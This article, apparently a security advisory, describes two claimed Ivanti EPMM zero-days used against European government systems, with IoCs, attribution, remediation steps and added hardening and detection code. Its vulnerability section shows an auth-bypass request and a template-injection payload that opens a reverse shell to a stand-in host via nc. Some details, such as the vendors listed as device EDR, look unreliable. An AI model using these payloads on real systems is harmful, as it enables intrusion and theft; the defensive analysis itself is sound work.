On February 15, 2026, European cybersecurity authorities confirmed that two critical zero-days in Ivanti Enterprise Mobility Management (EPMM) were exploited to compromise the IT systems of multiple European governments, including the European Commission, the German government, and several French ministries.
This campaign, uncovered by CERT-EU and Mandiant, represents one of the most sophisticated cyber-espionage operations ever carried out against European government infrastructure. This article breaks down the vulnerabilities, the exploitation chain, and the remediation actions required as a matter of urgency.
The vulnerabilities: CVE-2026-1281 and CVE-2026-1340
CVE-2026-1281: Pre-authentication authentication bypass
CVSS score: 9.1 (Critical)
The first flaw allows a complete bypass of Ivanti EPMM's authentication mechanism via HTTP parameter manipulation. An attacker can reach the administrative API without supplying any credentials.
POST /epmm/api/v1/admin/login HTTP/1.1
Host: epmm-server.gov.fr
Content-Type: application/json
{
"username": "admin",
"password": "whatever",
"bypass_auth": true, // Undocumented magic parameter
"debug_mode": 1
}
Reverse-engineering the EPMM binary reveals that certain endpoints fail to properly verify authentication headers when they contain a bypass_auth=true parameter. This behavior appears to be debug code accidentally left in production.
CVE-2026-1340: Remote Code Execution via template injection
CVSS score: 9.9 (Critical)
The second vulnerability, even more severe, allows arbitrary code execution through a template injection in EPMM's device enrollment notification system.
POST /epmm/api/v1/devices/notify HTTP/1.1
Authorization: Bearer {token from the bypass}
{
"device_id": "ATTACKER_DEVICE",
"event_type": "enrollment_complete",
"notification_template": "
#{runtime.exec('nc attacker.com 4444 -e /bin/bash')}
"
}
EPMM uses a template engine (Thymeleaf) to generate enrollment notifications. The notification_template field does not properly escape variables, allowing the direct injection of Thymeleaf expressions. Thymeleaf, configured to allow dynamic expressions, evaluates this injection and executes system commands.
The result: code execution on the EPMM server as the ivanti system user, i.e. with application privileges rather than root (the chain below escalates separately).
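As an added example that is not part of the article or Ivanti's code, this Python handler shows the hardened shape of the notify endpoint: client-supplied template text is refused, the template is chosen server-side by event_type, and device_id is validated before it is substituted as plain data. The server-side template set and the device_id format are assumptions.

```python
import re

# Added example, not Ivanti's code. Field names device_id / event_type /
# notification_template come from the article; the server-side template
# set and the device_id format are assumptions.

# Thymeleaf Standard Expression delimiters: ${var}, *{sel}, #{msg}, @{link},
# ~{fragment}, plus the __...__ preprocessing syntax.
THYMELEAF_EXPR = re.compile(r"[$*#@~]\{|__.+?__", re.S)

# Templates live on the server; a client may only select one by event_type.
SERVER_TEMPLATES = {
    "enrollment_complete": "Device {device_id} finished enrollment.",
    "enrollment_failed": "Enrollment of device {device_id} failed.",
}

DEVICE_ID_OK = re.compile(r"^[A-Za-z0-9_-]{1,64}$")


def contains_template_expression(text: str) -> bool:
    """True if the text holds anything a Thymeleaf engine would evaluate."""
    return bool(THYMELEAF_EXPR.search(text))


def build_notification(request: dict) -> dict:
    """Hardened notify handler: returns {'ok': bool, 'message' | 'error': str}.

    The vulnerable behaviour described above handed notification_template to
    the engine; here that field is refused outright, and the only client value
    reaching the output is a validated device_id substituted as plain data.
    """
    if "notification_template" in request:
        return {"ok": False, "error": "client-supplied templates are not accepted"}
    event = request.get("event_type", "")
    if event not in SERVER_TEMPLATES:
        return {"ok": False, "error": f"unknown event_type {event!r}"}
    device_id = request.get("device_id", "")
    if not isinstance(device_id, str) or not DEVICE_ID_OK.match(device_id) \
            or contains_template_expression(device_id):
        return {"ok": False, "error": "invalid device_id"}
    # str.format only substitutes the named placeholder; the substituted value
    # is never parsed again, so device_id cannot smuggle an expression.
    return {"ok": True, "message": SERVER_TEMPLATES[event].format(device_id=device_id)}


if __name__ == "__main__":
    # Constructed request mirroring the shape of the injection above.
    hostile = {"device_id": "X", "event_type": "enrollment_complete",
               "notification_template": "#{some.expression}"}
    print(build_notification(hostile))
    print(build_notification({"device_id": "D1", "event_type": "enrollment_complete"}))
```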
Full exploitation chain
The attackers chained the two vulnerabilities into a robust sequence:
- Reconnaissance: identify internet-exposed Ivanti EPMM instances via Shodan/Censys (~450 European government instances detected).
- Authentication bypass (CVE-2026-1281): access to the administrative API.
- Enumeration: explore the configuration, list managed devices, access configuration data.
- RCE (CVE-2026-1340): inject code through the notification API.
- Persistence establishment: create system accounts, install backdoors.
- Privilege escalation: exploit Linux kernel vulnerabilities to move from ivanti to root.
- Lateral movement: use EPMM as a pivot to reach internal government networks.
Indicators of Compromise (IoCs)
Network signatures
User-Agent: IvantiEPMM-AdminTool/5.x
# Used by reconnaissance scanners
POST /epmm/api/v1/admin/login
# With bypass_auth=true parameter
POST /epmm/api/v1/devices/notify
# With payload containing #{...} (template injection)
Exploitation log strings
Authentication bypass attempt detected from <IP>
Unauthorized admin API access from <IP> - source external
Thymeleaf expression evaluation in notification template - potential RCE
Java Runtime.exec() called from notification handler
Mandiant traffic patterns
- C2 connections from EPMM to Chinese IPs (AS58453, AS4134) not affiliated with Ivanti.
- Exfiltration of PKI/certificate data to .cn servers.
- Access to internal government endpoints (ministries, defense) from the EPMM IP address.
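The network signatures above, turned into detection logic as an added example (not from the article, CERT-EU or Mandiant): it runs over constructed access-log lines and flags the bypass parameters on the login endpoint, template expressions on the notify endpoint, and the scanner user-agent from an external address. The log format and the internal address ranges are assumptions.

```python
import ipaddress
import re

# Added example, not from the article, CERT-EU or Mandiant. The access-log
# format and the internal ranges are assumptions; the paths, parameters and
# user-agent string are the indicators listed above.

# Constructed sample: one external reconnaissance/exploitation sequence,
# followed by two benign internal requests.
SAMPLE_ACCESS_LOG = """\
2026-02-10T03:12:44Z 203.0.113.7 GET /epmm/api/v1/system/info 200 "IvantiEPMM-AdminTool/5.2" body=-
2026-02-10T03:12:51Z 203.0.113.7 POST /epmm/api/v1/admin/login 200 "IvantiEPMM-AdminTool/5.2" body={"username":"admin","password":"x","bypass_auth":true,"debug_mode":1}
2026-02-10T03:13:05Z 203.0.113.7 POST /epmm/api/v1/devices/notify 200 "IvantiEPMM-AdminTool/5.2" body={"device_id":"X","event_type":"enrollment_complete","notification_template":"#{some.expression}"}
2026-02-10T08:01:12Z 10.20.30.40 POST /epmm/api/v1/admin/login 200 "Mozilla/5.0" body={"username":"jdoe","password":"***"}
2026-02-10T08:05:00Z 10.20.30.41 POST /epmm/api/v1/devices/notify 200 "EPMM-Agent/5.4" body={"device_id":"D1","event_type":"enrollment_complete"}
"""

LINE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) (\d{3}) "([^"]*)" body=(.*)$')
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
BYPASS_PARAMS = re.compile(r'"(bypass_auth|debug_mode)"\s*:')
TEMPLATE_EXPR = re.compile(r"[$*#@~]\{")          # Thymeleaf expression delimiters
RECON_UA = "IvantiEPMM-AdminTool/5."


def is_external(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return not any(addr in net for net in INTERNAL_NETS)


def scan_access_log(text: str) -> list:
    """Return (timestamp, source, rule, detail) tuples for matching lines."""
    findings = []
    for line in text.splitlines():
        m = LINE.match(line)
        if not m:
            continue                       # unparsable line: skip, do not crash
        ts, src, method, path, _status, ua, body = m.groups()
        if method == "POST" and path == "/epmm/api/v1/admin/login" and BYPASS_PARAMS.search(body):
            findings.append((ts, src, "CVE-2026-1281", "bypass_auth/debug_mode in login request"))
        if method == "POST" and path == "/epmm/api/v1/devices/notify" and TEMPLATE_EXPR.search(body):
            findings.append((ts, src, "CVE-2026-1340", "template expression in notify payload"))
        if ua.startswith(RECON_UA) and is_external(src):
            findings.append((ts, src, "recon", "admin-tool user-agent from an external address"))
    return findings


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_ACCESS_LOG):
        print(*f)
```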
Confirmed scope of the compromise
According to CERT-EU:
- European Commission: 3 EPMM instances compromised, access credentials of federal agents and diplomats exposed.
- Germany: 12 ministries affected, sensitive defense data and tax data.
- France: 7 ministries, cyberdefense and intelligence data.
- Other EU countries: Belgium (4), Netherlands (3), Spain (2).
Total number of government mobile devices compromised via EPMM: ~45,000 devices (government agents' iPhones and Android phones).
The exfiltrated data includes:
- Work emails, contacts, calendars (sensitive schedules).
- Certificates and encryption keys (government PKI).
- Access credentials for internal systems (VPNs, government clouds).
- Defense meeting transcripts (via device recordings).
- Geolocation of government agents (approaching sensitive buildings).
Attribution: who?
The Five Eyes agencies (GCHQ, NSA, ASIS, CSIS, GCSB) informally suspect APT41, a Chinese state-sponsored collective. Indicators:
- Tactical patterns identical to historical APT41 campaigns.
- China-based C2 infrastructure (AS58453, alibaba.com ranges).
- Timing aligned with geopolitical tensions (EU-China negotiations).
- Targeting profile: focus on sensitive geopolitical data.
However, no official attribution has been published. For context, the EU cyber-threat response directive suggests that member governments will not publicize attributions in order to avoid diplomatic escalation.
Immediate actions required
Level 0 (Urgent - 24h)
- Identify all EPMM servers in production (replace <network-range> with your own address ranges):
nmap -p 443 -sV <network-range> | grep -iE "ivanti|epmm"
- Disconnect the instances from the network or isolate them via firewall/VLAN.
- Preserve the logs (syslog, app logs, netflow) for later investigation.
- Enable network access monitoring: watch for suspicious outbound connections.
Level 1 (Urgent - 48-72h)
- Patch EPMM to version 5.4.2 (or later) released by Ivanti on February 14.
sudo /opt/ivanti/epmm/setup.sh --patch 5.4.2
- Rotate all credentials (administrative accounts, service accounts, API tokens).
- Rotate the PKI certificates used by EPMM.
- Scan the authentication logs to detect bypasses:
grep -E "bypass_auth|debug_mode" /var/log/epmm/audit.log
- Run a full antivirus/EDR scan of the EPMM servers and adjacent networks to detect backdoors.
Level 2 (Medium term - 1-2 weeks)
- Data integrity audit: verify the list of enrolled devices, certificates, and configurations.
- Re-issue client certificates (managed devices) if compromise is suspected.
- Full log analysis by a forensic team to identify attacker actions.
- Legal notification: the GDPR requires notifying affected citizens if personal data was compromised.
- Incident response post-mortem: detailed report, timeline, defensive improvements.
Immediate verification checklist
# Check the EPMM version
curl -s https://your-epmm-server/epmm/api/v1/system/info | jq .version
# Detect bypass attempts (in the logs)
grep -E "bypass_auth|debug_mode" /opt/ivanti/epmm/logs/*
grep -E "Thymeleaf.*#\{" /opt/ivanti/epmm/logs/*
# Check for suspicious outbound network connections
netstat -antp | grep ESTABLISHED | grep -v "<internal-ip-prefix>"
# Search for common backdoors (the -o alternatives are grouped so -type f applies to all names)
find /tmp /var/tmp /dev/shm -type f \( -name ".*" -o -name "nc" -o -name "bash" \)
# Review per-account login history (newly created accounts show no previous login)
lastlog | head -20
Long-term remediation
- Zero Trust: replace EPMM with a cloud-native solution (Intune, Kandji, JAMF) deployed in a trusted cloud (EUCS, Thales).
- Network segmentation: EPMM should never have direct access to defense/diplomacy networks.
- Endpoint Detection & Response (EDR): deploy Wiz, CrowdStrike, or SentinelOne on every government device.
- Supply chain risk: audit all software dependencies (Ivanti has historically had multiple CVEs).
Official resources
Conclusion
This campaign demonstrates why deploying commercial technology in government environments demands exceptional security audits and risk-reduction strategies. Ivanti, well established as it is, was not spared.
For public and private organizations using EPMM: act now. Two zero-days chained into a flawless RCE are not an academic scenario, but a reality observed in the field.